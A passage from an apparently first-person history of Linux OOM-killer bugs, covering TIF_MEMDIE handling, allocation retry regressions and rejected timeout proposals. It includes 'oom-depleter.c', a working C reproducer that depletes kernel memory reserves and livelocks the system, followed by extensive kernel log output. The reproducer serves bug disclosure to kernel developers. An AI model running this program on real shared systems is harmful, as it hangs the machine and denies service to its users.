Like I explained at the OOM killer's behavior, a terminating thread releases mm_struct at exit_mm() called from do_exit() and clears TIF_MEMDIE flag. Therefore, setting TIF_MEMDIE flag via task_will_free_mem(current) in out_of_memory() needs to be permitted only when the current thread has not released mm_struct.

But since such check was not performed, a child process which was killed by the OOM killer got TIF_MEMDIE flag again, and the parent process cannot reap the child process due to memory allocation request is in progress, and the TIF_MEMDIE flag set on the child process blocks memory allocation request by the parent process, and resulted in OOM livelock situation.

This bug was fixed by commit d7a94e7e11badf84 ("oom: don't count on mm-less current process") and commit 83363b917a2982dd ("oom: make sure that TIF_MEMDIE is set under task_lock").

February 2015  An affair which corrupted reliability of file I/O

Between Linux 3.19-rc6 and Linux 3.19-rc7, a patch named commit 9879de7373fc ("mm: page_alloc: embed OOM killing naturally into allocation slowpath") was merged. Originally the patch merely meant to be a clean up, but the patch had a side effect that makes GFP_NOFS / GFP_NOIO allocation requests not to retry (in other words, no longer apply the "too small to fail" memory-allocation rule), a completely unusable situation where ext4 filesystem gets errors by simply invoking the OOM killer occurred.

Of course, it would be the best if we can get rid of the "too small to fail" memory-allocation rule. But suddenly removing it without any preparation like a sucker punch is not acceptable. Therefore, the original behavior was restored by commit cc87317726f85153 ("mm: page_alloc: revert inadvertent !__GFP_FS retry behavior change").

Then, an attempt which limits number of retries in a memory allocation request using /proc/sys/vm/nr_alloc_retry interface was made. But since nobody actively tests the behavior of out of memory situation, there is no chance to gradually decrease the retries, and vanished in smoke. Therefore, the "too small to fail" memory-allocation rule still exists.

June 2015  Timeout-based workaround for OOM livelock situation after the OOM killer is invoked

Instead of /proc/sys/vm/panic_on_oom interface which immediately triggers the kernel panic as soon as the OOM killer is invoked, an attempt which triggers the kernel panic only when the OOM livelock situation was not solved within a threshold period controlled by /proc/sys/vm/panic_on_oom_timeout interface after the OOM killer was invoked was made. But since we did not came to agreement on when to trigger the kernel panic, this attempt also vanished in smoke.

In the background, there was a conflict between "the system should be rebooted via the kernel panic rather than selecting next OOM victim if the OOM livelock situation was not solved within predetermined period" and "rebooting the system via the kernel panic is too much because there is possibility that selecting next OOM victim for several times can solve the OOM livelock situation".

August 2015  Memory depletion due to ordering of setting TIF_MEMDIE flag and sending SIGKILL signal

This topic is about pointing out a flow in abovementioned commit 83363b917a2982dd ("oom: make sure that TIF_MEMDIE is set under task_lock") patch. When the patch was proposed, I commented that "We should set TIF_MEMDIE flag after sending SIGKILL signal". But at that time, my comment was rejected with "It makes no difference because the process will be terminated anyway" response. Therefore, I demonstrated how large the time window between setting TIF_MEMDIE flag and sending SIGKILL signal can become, using a fact that printing kernel messages using printk() is rather a slow operation.

---------- oom-depleter.c start ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>

static int null_fd = EOF;
static char *buf = NULL;
static unsigned long size = 0;

static int dummy(void *unused)
{
        pause();
        return 0;
}

static int trigger(void *unused)
{
        read(null_fd, buf, size); /* Will cause OOM due to overcommit */
        return 0;
}

int main(int argc, char *argv[])
{
        int pipe_fd[2] = { EOF, EOF };
        unsigned long i;
        null_fd = open("/dev/zero", O_RDONLY);
        pipe(pipe_fd);
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        /*
         * Create many child threads in order to enlarge time lag between
         * the OOM killer sets TIF_MEMDIE to thread group leader and
         * the OOM killer sends SIGKILL to that thread.
         */
        for (i = 0; i < 1000; i++) {
                clone(dummy, malloc(1024) + 1024, CLONE_SIGHAND | CLONE_VM,
                      NULL);
                if (!i)
                        close(pipe_fd[1]);
        }
        /* Let a child thread trigger the OOM killer. */
        clone(trigger, malloc(4096)+ 4096, CLONE_SIGHAND | CLONE_VM, NULL);
        /* Wait until the first child thread is killed by the OOM killer. */
        read(pipe_fd[0], &i, 1);
        /* Deplete all memory reserve using the time lag. */
        for (i = size; i; i -= 4096)
                buf[i - 1] = 1;
        return * (char *) NULL; /* Kill all threads. */
}
---------- oom-depleter.c end ----------
---------- Example output start ----------
[   38.613801] sysrq: SysRq : Show Memory
[   38.616506] Mem-Info:
[   38.618106] active_anon:18185 inactive_anon:2085 isolated_anon:0
[   38.618106]  active_file:10615 inactive_file:18972 isolated_file:0
[   38.618106]  unevictable:0 dirty:7 writeback:0 unstable:0
[   38.618106]  slab_reclaimable:3015 slab_unreclaimable:4217
[   38.618106]  mapped:9940 shmem:2146 pagetables:1319 bounce:0
[   38.618106]  free:378300 free_pcp:486 free_cma:0
[   38.640475] Node 0 DMA free:9980kB min:400kB low:500kB high:600kB active_anon:2924kB inactive_anon:80kB active_file:816kB inactive_file:896kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:596kB shmem:80kB slab_reclaimable:240kB slab_unreclaimable:308kB kernel_stack:80kB pagetables:64kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   38.655621] lowmem_reserve[]: 0 1731 1731 1731
[   38.657497] Node 0 DMA32 free:1503220kB min:44652kB low:55812kB high:66976kB active_anon:69816kB inactive_anon:8260kB active_file:41644kB inactive_file:74992kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:28kB writeback:0kB mapped:39164kB shmem:8504kB slab_reclaimable:11820kB slab_unreclaimable:16560kB kernel_stack:3472kB pagetables:5212kB unstable:0kB bounce:0kB free_pcp:1944kB local_pcp:668kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   38.672950] lowmem_reserve[]: 0 0 0 0
[   38.673726] Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
[   38.676854] Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB
[   38.680159] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   38.681517] 31733 total pagecache pages
[   38.682162] 0 pages in swap cache
[   38.682711] Swap cache stats: add 0, delete 0, find 0/0
[   38.683554] Free swap  = 0kB
[   38.684053] Total swap = 0kB
[   38.684528] 524157 pages RAM
[   38.685022] 0 pages HighMem/MovableOnly
[   38.685645] 76583 pages reserved
[   38.686173] 0 pages hwpoisoned
[   48.046321] oom-depleter invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0
[   48.047754] oom-depleter cpuset=/ mems_allowed=0
[   48.048779] CPU: 1 PID: 4797 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80
[   48.050612] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   48.052434]  0000000000000000 000000004ecba3fc ffff88006c4938d0 ffffffff81614c2f
[   48.053816]  ffff88006c482580 ffff88006c493970 ffffffff81611671 0000000000001000
[   48.055218]  ffff88006c493918 ffffffff8109463c ffff8800784b2b40 ffff88007fc556f8
[   48.057428] Call Trace:
[   48.058775]  [<ffffffff81614c2f>] dump_stack+0x44/0x55
[   48.060647]  [<ffffffff81611671>] dump_header+0x84/0x21c
[   48.062591]  [<ffffffff8109463c>] ? update_curr+0x9c/0xe0
[   48.064393]  [<ffffffff810917f7>] ? __enqueue_entity+0x67/0x70
[   48.066506]  [<ffffffff81096b59>] ? set_next_entity+0x69/0x360
[   48.068633]  [<ffffffff81091ee0>] ? pick_next_entity+0xa0/0x150
[   48.070768]  [<ffffffff8110fad4>] oom_kill_process+0x364/0x3d0
[   48.072874]  [<ffffffff81281550>] ? security_capable_noaudit+0x40/0x60
[   48.074948]  [<ffffffff8110fd83>] out_of_memory+0x1f3/0x490
[   48.076820]  [<ffffffff81115214>] __alloc_pages_nodemask+0x904/0x930
[   48.078885]  [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[   48.080781]  [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[   48.082936]  [<ffffffff8112ffce>] ? vmacache_find+0x1e/0xc0
[   48.084981]  [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[   48.086791]  [<ffffffff81055f50>] do_page_fault+0x30/0x80
[   48.088636]  [<ffffffff81096b59>] ? set_next_entity+0x69/0x360
[   48.090630]  [<ffffffff8161c918>] page_fault+0x28/0x30
[   48.092359]  [<ffffffff813124c0>] ? __clear_user+0x20/0x50
[   48.094065]  [<ffffffff81316dd8>] iov_iter_zero+0x68/0x250
[   48.095939]  [<ffffffff813e9ef8>] read_iter_zero+0x38/0xa0
[   48.097690]  [<ffffffff8117ad04>] __vfs_read+0xc4/0xf0
[   48.099545]  [<ffffffff8117b489>] vfs_read+0x79/0x120
[   48.101129]  [<ffffffff8117c1a0>] SyS_read+0x50/0xc0
[   48.102648]  [<ffffffff8161adee>] entry_SYSCALL_64_fastpath+0x12/0x71
[   48.104388] Mem-Info:
[   48.105396] active_anon:410470 inactive_anon:2085 isolated_anon:0
[   48.105396]  active_file:0 inactive_file:31 isolated_file:0
[   48.105396]  unevictable:0 dirty:0 writeback:0 unstable:0
[   48.105396]  slab_reclaimable:1689 slab_unreclaimable:5719
[   48.105396]  mapped:390 shmem:2146 pagetables:2097 bounce:0
[   48.105396]  free:12966 free_pcp:63 free_cma:0
[   48.114279] Node 0 DMA free:7308kB min:400kB low:500kB high:600kB active_anon:6764kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[   48.124147] lowmem_reserve[]: 0 1731 1731 1731
[   48.125753] Node 0 DMA32 free:44556kB min:44652kB low:55812kB high:66976kB active_anon:1635116kB inactive_anon:8260kB active_file:0kB inactive_file:124kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1552kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:252kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:1620 all_unreclaimable? yes
[   48.137007] lowmem_reserve[]: 0 0 0 0
[   48.138514] Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
[   48.143010] Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB
[   48.148196] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   48.150810] 2156 total pagecache pages
[   48.152318] 0 pages in swap cache
[   48.154200] Swap cache stats: add 0, delete 0, find 0/0
[   48.156089] Free swap  = 0kB
[   48.157400] Total swap = 0kB
[   48.158694] 524157 pages RAM
[   48.160055] 0 pages HighMem/MovableOnly
[   48.161496] 76583 pages reserved
[   48.162989] 0 pages hwpoisoned
[   48.164453] [ pid ]   uid  tgid total_vm      rss nr_ptes nr_pmds swapents oom_score_adj name
(...snipped...)
[   50.061069] [ 4797]  1000  4797   541715   392157     776       6        0             0 oom-depleter
[   50.062841] Out of memory: Kill process 3796 (oom-depleter) score 877 or sacrifice child
[   50.064684] Killed process 3796 (oom-depleter) total-vm:2166860kB, anon-rss:1568628kB, file-rss:0kB
[   50.066454] Kill process 3797 (oom-depleter) sharing same memory
(...snipped...)
[   50.247563] Kill process 3939 (oom-depleter) sharing same memory
[   50.248677] oom-depleter: page allocation failure: order:0, mode:0x280da
[   50.248679] CPU: 2 PID: 3796 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80
[   50.248680] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   50.248682]  0000000000000000 000000001529812f ffff88007be67be0 ffffffff81614c2f
[   50.248683]  00000000000280da ffff88007be67c70 ffffffff81111914 0000000000000000
[   50.248684]  ffff88007fffdb28 0000000000000000 ffff88007fc99030 ffff88007be67d30
[   50.248684] Call Trace:
[   50.248689]  [<ffffffff81614c2f>] dump_stack+0x44/0x55
[   50.248692]  [<ffffffff81111914>] warn_alloc_failed+0xf4/0x150
[   50.248693]  [<ffffffff81114b76>] __alloc_pages_nodemask+0x266/0x930
[   50.248695]  [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[   50.248697]  [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[   50.248702]  [<ffffffff8100d6dc>] ? __switch_to+0x23c/0x470
[   50.248704]  [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[   50.248706]  [<ffffffff81055f50>] do_page_fault+0x30/0x80
[   50.248707]  [<ffffffff8161c918>] page_fault+0x28/0x30
[   50.248708] Mem-Info:
[   50.248710] active_anon:423405 inactive_anon:2085 isolated_anon:0
[   50.248710]  active_file:7 inactive_file:10 isolated_file:0
[   50.248710]  unevictable:0 dirty:0 writeback:0 unstable:0
[   50.248710]  slab_reclaimable:1689 slab_unreclaimable:5719
[   50.248710]  mapped:393 shmem:2146 pagetables:2097 bounce:0
[   50.248710]  free:0 free_pcp:21 free_cma:0
[   50.248714] Node 0 DMA free:28kB min:400kB low:500kB high:600kB active_anon:13988kB inactive_anon:80kB active_file:28kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:4 all_unreclaimable? no
[   50.248715] lowmem_reserve[]: 0 1731 1731 1731
[   50.248717] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1679632kB inactive_anon:8260kB active_file:0kB inactive_file:48kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1576kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:84kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   50.248718] lowmem_reserve[]: 0 0 0 0
[   50.248721] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   50.248723] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   50.248724] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   50.248724] 2149 total pagecache pages
[   50.248725] 0 pages in swap cache
[   50.248725] Swap cache stats: add 0, delete 0, find 0/0
[   50.248725] Free swap  = 0kB
[   50.248726] Total swap = 0kB
[   50.248726] 524157 pages RAM
[   50.248726] 0 pages HighMem/MovableOnly
[   50.248726] 76583 pages reserved
[   50.248727] 0 pages hwpoisoned
(...snipped...)
[   50.248940] oom-depleter: page allocation failure: order:0, mode:0x280da
[   50.248940] CPU: 2 PID: 3796 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80
[   50.248940] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   50.248941]  0000000000000000 000000001529812f ffff88007be67be0 ffffffff81614c2f
[   50.248942]  00000000000280da ffff88007be67c70 ffffffff81111914 0000000000000000
[   50.248942]  ffff88007fffdb28 0000000000000000 ffff88007fc99030 ffff88007be67d30
[   50.248942] Call Trace:
[   50.248943]  [<ffffffff81614c2f>] dump_stack+0x44/0x55
[   50.248944]  [<ffffffff81111914>] warn_alloc_failed+0xf4/0x150
[   50.248945]  [<ffffffff81114b76>] __alloc_pages_nodemask+0x266/0x930
[   50.248946]  [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[   50.248947]  [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[   50.248948]  [<ffffffff81110080>] ? pagefault_out_of_memory+0x60/0xb0
[   50.248949]  [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[   50.248950]  [<ffffffff81055f50>] do_page_fault+0x30/0x80
[   50.248951]  [<ffffffff8161c918>] page_fault+0x28/0x30
[   50.248951] Mem-Info:
[   50.248952] active_anon:423405 inactive_anon:2085 isolated_anon:0
[   50.248952]  active_file:7 inactive_file:10 isolated_file:0
[   50.248952]  unevictable:0 dirty:0 writeback:0 unstable:0
[   50.248952]  slab_reclaimable:1689 slab_unreclaimable:5719
[   50.248952]  mapped:393 shmem:2146 pagetables:2097 bounce:0
[   50.248952]  free:0 free_pcp:21 free_cma:0
[   50.248954] Node 0 DMA free:28kB min:400kB low:500kB high:600kB active_anon:13988kB inactive_anon:80kB active_file:28kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:4 all_unreclaimable? no
[   50.248955] lowmem_reserve[]: 0 1731 1731 1731
[   50.248957] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1679632kB inactive_anon:8260kB active_file:0kB inactive_file:48kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1576kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:84kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   50.248957] lowmem_reserve[]: 0 0 0 0
[   50.248959] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   50.248961] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   50.248961] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   50.248962] 2149 total pagecache pages
[   50.248962] 0 pages in swap cache
[   50.248962] Swap cache stats: add 0, delete 0, find 0/0
[   50.248962] Free swap  = 0kB
[   50.248962] Total swap = 0kB
[   50.248963] 524157 pages RAM
[   50.248963] 0 pages HighMem/MovableOnly
[   50.248963] 76583 pages reserved
[   50.248963] 0 pages hwpoisoned
[   51.212857] Kill process 3940 (oom-depleter) sharing same memory
(...snipped...)
[   52.299532] Kill process 4797 (oom-depleter) sharing same memory
[   85.966108] sysrq: SysRq : Show Memory
[   85.967079] Mem-Info:
[   85.967643] active_anon:423788 inactive_anon:2085 isolated_anon:0
[   85.967643]  active_file:0 inactive_file:1 isolated_file:0
[   85.967643]  unevictable:0 dirty:0 writeback:0 unstable:0
[   85.967643]  slab_reclaimable:1689 slab_unreclaimable:5401
[   85.967643]  mapped:391 shmem:2146 pagetables:2123 bounce:0
[   85.967643]  free:4 free_pcp:0 free_cma:0
[   85.974400] Node 0 DMA free:0kB min:400kB low:500kB high:600kB active_anon:14076kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:340kB kernel_stack:240kB pagetables:572kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:8 all_unreclaimable? yes
[   85.983232] lowmem_reserve[]: 0 1731 1731 1731
[   85.984550] Node 0 DMA32 free:16kB min:44652kB low:55812kB high:66976kB active_anon:1681076kB inactive_anon:8260kB active_file:0kB inactive_file:4kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1556kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:21264kB kernel_stack:19328kB pagetables:7920kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   85.994326] lowmem_reserve[]: 0 0 0 0
[   85.995638] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   85.998389] Node 0 DMA32: 3*4kB (UM) 1*8kB (U) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 36kB
[   86.001506] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   86.003604] 2147 total pagecache pages
[   86.004878] 0 pages in swap cache
[   86.006083] Swap cache stats: add 0, delete 0, find 0/0
[   86.007638] Free swap  = 0kB
[   86.008793] Total swap = 0kB
[   86.009941] 524157 pages RAM
[   86.011089] 0 pages HighMem/MovableOnly
[   86.012413] 76583 pages reserved
[   86.013632] 0 pages hwpoisoned
[  125.269135] sysrq: SysRq : Show State
[  125.270536]   task                        PC stack   pid father
[  125.272269] systemd         S ffff88007cc07a08     0     1      0 0x00000000
[  125.274343]  ffff88007cc07a08 ffff88007cc08000 ffff88007cc08000 ffff88007cc07a40
[  125.276505]  ffff88007fc0db00 00000000fffd55be ffff88007fffc000 ffff88007cc07a20
[  125.278661]  ffffffff8161793e ffff88007fc0db00 ffff88007cc07aa8 ffffffff81619fcd
[  125.280844] Call Trace:
[  125.282076]  [<ffffffff8161793e>] schedule+0x2e/0x70
[  125.283698]  [<ffffffff81619fcd>] schedule_timeout+0x11d/0x1c0
[  125.285481]  [<ffffffff810be7c0>] ? cascade+0x90/0x90
[  125.287131]  [<ffffffff8111caef>] ? pfmemalloc_watermark_ok+0xaf/0xe0
[  125.289038]  [<ffffffff8111ccee>] throttle_direct_reclaim+0x1ce/0x240
[  125.290955]  [<ffffffff810a0870>] ? wait_woken+0x80/0x80
[  125.292676]  [<ffffffff81120bd0>] try_to_free_pages+0x80/0xc0
[  125.294478]  [<ffffffff81114e14>] __alloc_pages_nodemask+0x504/0x930
[  125.296401]  [<ffffffff8110cb07>] ? __page_cache_alloc+0x97/0xb0
[  125.298283]  [<ffffffff8115576c>] alloc_pages_current+0x8c/0x100
[  125.300141]  [<ffffffff8110cb07>] __page_cache_alloc+0x97/0xb0
[  125.301977]  [<ffffffff8110e728>] filemap_fault+0x218/0x490
[  125.303759]  [<ffffffff81237c79>] xfs_filemap_fault+0x39/0x60
[  125.305576]  [<ffffffff81132e69>] __do_fault+0x49/0xf0
[  125.307273]  [<ffffffff8113809f>] handle_mm_fault+0xe7f/0x1960
[  125.309100]  [<ffffffff811bac6e>] ? ep_scan_ready_list.isra.12+0x19e/0x1c0
[  125.311114]  [<ffffffff811badce>] ? ep_poll+0x11e/0x320
[  125.312841]  [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[  125.314643]  [<ffffffff81055f50>] do_page_fault+0x30/0x80
[  125.316363]  [<ffffffff8161c918>] page_fault+0x28/0x30
(...snipped...)
[  130.699717] oom-depleter    x ffff88007c06bc28     0  3797      1 0x00000086
[  130.701724]  ffff88007c06bc28 ffff88007a623e80 ffff88007c06c000 ffff88007a6241d0
[  130.703703]  ffff88007c6373e8 ffff88007a623e80 ffff88007cc08000 ffff88007c06bc40
[  130.705678]  ffffffff8161793e ffff88007a624450 ffff88007c06bcb0 ffffffff8106b0d7
[  130.707654] Call Trace:
[  130.708632]  [<ffffffff8161793e>] schedule+0x2e/0x70
[  130.710064]  [<ffffffff8106b0d7>] do_exit+0x677/0xae0
[  130.711535]  [<ffffffff8106b5ba>] do_group_exit+0x3a/0xb0
[  130.713037]  [<ffffffff81074d4f>] get_signal+0x17f/0x540
[  130.714537]  [<ffffffff8100e302>] do_signal+0x32/0x650
[  130.715991]  [<ffffffff81099ffc>] ? load_balance+0x1bc/0x8b0
[  130.717545]  [<ffffffff8100362d>] prepare_exit_to_usermode+0x9d/0xf0
[  130.719275]  [<ffffffff81003753>] syscall_return_slowpath+0xd3/0x1d0
[  130.720973]  [<ffffffff816173a4>] ? __schedule+0x274/0x7e0
[  130.722536]  [<ffffffff8161793e>] ? schedule+0x2e/0x70
[  130.723989]  [<ffffffff8161af4c>] int_ret_from_sys_call+0x25/0x8f
(...snipped...)
[  157.243284] oom-depleter    R  running task        0  4797      1 0x00000084
[  157.245131]  ffff88006c482580 000000004ecba3fc ffff88007fc83c38 ffffffff8108d14a
[  157.247105]  ffff88006c482580 ffff88006c4827c0 ffff88007fc83c78 ffffffff8108d23d
[  157.249092]  ffff88006c482970 000000004ecba3fc ffffffff8188b780 0000000000000074
[  157.251054] Call Trace:
[  157.252018]  <IRQ>  [<ffffffff8108d14a>] sched_show_task+0xaa/0x110
[  157.253740]  [<ffffffff8108d23d>] show_state_filter+0x8d/0xc0
[  157.255258]  [<ffffffff813cd31b>] sysrq_handle_showstate+0xb/0x20
[  157.256898]  [<ffffffff813cda24>] __handle_sysrq+0xf4/0x150
[  157.258442]  [<ffffffff813cde10>] sysrq_filter+0x360/0x3a0
[  157.259974]  [<ffffffff81497c12>] input_to_handler+0x52/0x100
[  157.261552]  [<ffffffff81499797>] input_pass_values.part.5+0x167/0x180
[  157.263270]  [<ffffffff81499afb>] input_handle_event+0xfb/0x4f0
[  157.264875]  [<ffffffff81499f3e>] input_event+0x4e/0x70
[  157.266366]  [<ffffffff814a18eb>] atkbd_interrupt+0x5bb/0x6a0
[  157.267929]  [<ffffffff81495101>] serio_interrupt+0x41/0x80
[  157.269457]  [<ffffffff81495d7a>] i8042_interrupt+0x1da/0x3a0
[  157.271017]  [<ffffffff810b0d3b>] handle_irq_event_percpu+0x2b/0x100
[  157.272678]  [<ffffffff810b0e4a>] handle_irq_event+0x3a/0x60
[  157.274224]  [<ffffffff810b3cb6>] handle_edge_irq+0xa6/0x140
[  157.275759]  [<ffffffff81010ad9>] handle_irq+0x19/0x30
[  157.277187]  [<ffffffff81010478>] do_IRQ+0x48/0xd0
[  157.278563]  [<ffffffff8161b8c7>] common_interrupt+0x87/0x87
[  157.280091]  <EOI>  [<ffffffff810a2eb9>] ? native_queued_spin_lock_slowpath+0x19/0x180
[  157.282070]  [<ffffffff8161a95c>] _raw_spin_lock+0x1c/0x20
[  157.283597]  [<ffffffff81130bcd>] __list_lru_count_one.isra.4+0x1d/0x50
[  157.285316]  [<ffffffff81130c1e>] list_lru_count_one+0x1e/0x20
[  157.286898]  [<ffffffff8117d610>] super_cache_count+0x50/0xd0
[  157.288477]  [<ffffffff8111d1d4>] shrink_slab.part.41+0xf4/0x280
[  157.290087]  [<ffffffff81120510>] shrink_zone+0x2c0/0x2d0
[  157.291595]  [<ffffffff81120894>] do_try_to_free_pages+0x164/0x420
[  157.293242]  [<ffffffff81120be4>] try_to_free_pages+0x94/0xc0
[  157.294799]  [<ffffffff81114e14>] __alloc_pages_nodemask+0x504/0x930
[  157.296474]  [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[  157.298019]  [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[  157.299606]  [<ffffffff8112ffce>] ? vmacache_find+0x1e/0xc0
[  157.301131]  [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[  157.302676]  [<ffffffff81055f50>] do_page_fault+0x30/0x80
[  157.304169]  [<ffffffff81096b59>] ? set_next_entity+0x69/0x360
[  157.305737]  [<ffffffff8161c918>] page_fault+0x28/0x30
[  157.307186]  [<ffffffff813124c0>] ? __clear_user+0x20/0x50
[  157.308699]  [<ffffffff81316dd8>] iov_iter_zero+0x68/0x250
[  157.310210]  [<ffffffff813e9ef8>] read_iter_zero+0x38/0xa0
[  157.311713]  [<ffffffff8117ad04>] __vfs_read+0xc4/0xf0
[  157.313155]  [<ffffffff8117b489>] vfs_read+0x79/0x120
[  157.314575]  [<ffffffff8117c1a0>] SyS_read+0x50/0xc0
[  157.315980]  [<ffffffff8161adee>] entry_SYSCALL_64_fastpath+0x12/0x71
[  157.317649] Showing busy workqueues and worker pools:
[  157.319070] workqueue events: flags=0x0
[  157.320261]   pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=4/256
[  157.321980]     pending: vmstat_shepherd, vmstat_update, e1000_watchdog [e1000], vmpressure_work_fn
